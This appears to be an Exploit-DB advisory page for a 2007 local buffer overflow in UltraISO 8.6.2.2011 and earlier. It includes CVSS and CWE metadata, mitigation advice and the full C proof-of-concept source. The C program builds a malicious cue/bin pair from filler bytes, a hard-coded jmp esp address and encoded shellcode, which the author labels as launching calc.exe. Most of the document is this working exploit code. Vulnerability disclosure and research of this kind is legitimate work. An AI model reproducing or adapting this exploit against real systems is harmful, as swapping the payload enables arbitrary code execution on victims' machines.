vendor:
UltraISO
by:
n00b
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: UltraISO
Affected Version From: <= 8.6.2.2011
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:ezb_systems:ultraiso:8.6.2.2011
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Service Pack 2
2007

UltraISO <= 8.6.2.2011 local buffer-overflow

This proof-of-concept exploit targets a local buffer overflow in UltraISO version 8.6.2.2011 and earlier. It generates a specially crafted bin and cue file pair; when the overflow is triggered, the attacker's code runs with the privileges of the user running the vulnerable software. The exploit has been tested on Windows XP Service Pack 2, and the author notes that the hard-coded jmp esp address may need to be changed for other versions. The shell_code used in the exploit is designed to execute the Windows calculator (calc.exe).

Mitigation:

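Upgrade to a version of UltraISO that is not vulnerable to this buffer overflow. The record above lists "Patch Exists: NO" and an unknown upper bound for affected versions, so confirm with the vendor which release contains the fix. Until then, avoid opening cue/bin files from untrusted sources in affected versions.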
Source

Exploit-DB raw data:

/*
Date : May 28th 2007.
UltraISO <= 8.6.2.2011 local buffer overflow by n00b
You might need to change the jmp esp address to match your version.
Tested on Win XP Service Pack 2 <eng>; executes calc. Don't
forget you need to have the bin and cue file in the same
directory. Special thanks to Thomas Pollet also.

*/

#include <stdlib.h>
#include <stdio.h>

// Calc shell_code
//
// Payload that main() writes into the cue sheet's FILE entry, directly after
// the filler and the 4-byte value. The "calc" label is the author's; the bytes
// are not decoded or verified anywhere in this file.
//
// Properties visible from the literal itself:
//   - it contains no NUL byte, so fputs() in main() emits it in full;
//   - after a ten-byte leading stub every byte is printable ASCII
//     (presumably the output of an alphanumeric encoder -- not confirmed here).
// The array is only ever written to a file by this program; it is never
// executed in this process.
unsigned char shell_code[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" 
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" 
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38" 
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" 
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38" 
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a" 
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x4f\x55\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57" 
"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x42\x30\x5a" ;

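/*
 * Writes the two files of the proof of concept: a malformed cue sheet
 * (argv[1]) and a placeholder bin file (argv[2]).
 *
 * The cue sheet is ordinary except for its FILE entry, whose quoted name is
 * built from 1099 filler bytes, a 4-byte value and the shell_code payload,
 * followed by the ".bin" suffix. A FILE name of a thousand-plus bytes, or one
 * holding non-printable bytes, is therefore the distinguishing trait of a cue
 * sheet produced by this program and is what a file scanner or parser-side
 * length check would key on.
 *
 * Returns 0 on every path, including the usage banner and fopen() failures.
 */
int main(int argc, char *argv[])
{
	FILE *cue;
	FILE *bin;

	/*
	 * Both output paths are required. The original tested argc < 2 and, when
	 * given a single path, went on to pass a NULL argv[2] to fopen().
	 */
	if (argc < 3) {
		system("cls");
		printf("\n *************************************************");
		printf("\n *************************************************");
		printf("\n *   Ultra Iso local buffer over flow by n00b    *");
		printf("\n *************************************************");
		printf("\n *          Special thanks to Str0ke             *");
		printf("\n *************************************************");
		printf("\n * Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo*");
		printf("\n * Date :          May 28th 2007                 *");
		printf("\n *************************************************");
		printf("\n * Credit's to n00b for finding this bug and poc *");
		printf("\n *************************************************");
		printf("\n    Usage:>  Exploit.cue   Exploit.bin            ");
		printf("\n *************************************************");

		return 0;
	}

	if (!(cue = fopen(argv[1], "w"))) {
		printf("[+] Error");
		return 0;
	}

	/* Opening of the FILE entry; everything up to ".bin" is the "file name". */
	fputs("FILE \"", cue);

	/* Fixed-length filler chosen by the author for the tested build. */
	for (int i = 0; i < 1099; i++) {
		fputs("A", cue);
	}

	/*
	 * 4-byte value the author's header comment calls the jmp esp address;
	 * per that comment it is tied to the tested build and may not match
	 * other versions.
	 */
	fputs("\x43\x41\xf8\x77", cue);

	/* shell_code holds no NUL byte, so fputs() writes the whole array. */
	fputs((char *)shell_code, cue);
	fputs(".bin \"", cue);
	fputs("\" BINARY\n", cue);
	fputs(" TRACK 01 MODE2/2352\n", cue);
	fputs(" INDEX 01 00:00:00\n", cue);

	fclose(cue);

	if (!(bin = fopen(argv[2], "w"))) {
		printf("[+] Error");
		return 0;
	}

	/* The bin file carries no payload; it only has to exist next to the cue. */
	fputs("Fake bin file\n", bin);
	fclose(bin);
	printf("File's successfully created");
	return 0;
}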

// milw0rm.com [2007-05-28]